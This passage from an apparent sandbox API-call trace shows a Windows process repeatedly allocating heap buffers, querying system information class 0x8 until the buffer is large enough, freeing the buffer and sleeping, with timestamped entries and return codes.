SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.211] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.215] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.217] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.219] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.219] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.219] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.220] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.220] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.221] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.221] Sleep (dwMilliseconds=0x110) [0200.242] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.242] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.243] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.243] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.243] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.244] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.252] Sleep (dwMilliseconds=0x110) [0200.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.304] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.305] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.305] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.310] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.313] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.313] Sleep (dwMilliseconds=0x110) [0200.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.348] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.349] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.349] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.350] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.350] Sleep (dwMilliseconds=0x110) [0200.400] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.400] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.401] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.401] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.401] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.401] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.402] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.402] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.402] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.402] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.408] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.409] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.409] Sleep (dwMilliseconds=0x110) [0200.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.527] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.528] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.531] Sleep (dwMilliseconds=0x110) [0200.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.551] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.551] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.554] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.555] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.555] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.555] Sleep (dwMilliseconds=0x110) [0200.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.573] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.573] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.573] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.573] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.574] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.574] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.574] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.574] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.574] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.575] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.577] Sleep (dwMilliseconds=0x110) [0200.605] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.605] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.606] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.608] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.611] Sleep (dwMilliseconds=0x110) [0200.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.632] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.633] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.633] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.633] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.634] Sleep (dwMilliseconds=0x110) [0200.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.641] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.641] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.642] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.642] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.642] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.643] Sleep (dwMilliseconds=0x110) [0200.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.659] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.660] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.660] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.660] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.661] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.661] Sleep (dwMilliseconds=0x110) [0200.676] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.676] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.677] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.677] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.677] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.678] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.678] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.678] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.679] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.679] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.680] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.680] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.689] Sleep (dwMilliseconds=0x110) [0200.707] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.707] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.708] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0200.708] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.708] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0200.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.713] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.713] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0200.713] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0200.714] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.714] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0200.715] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0200.715] Sleep (dwMilliseconds=0x110) [0200.761] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0200.761] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0200.762] HeapFree (in: 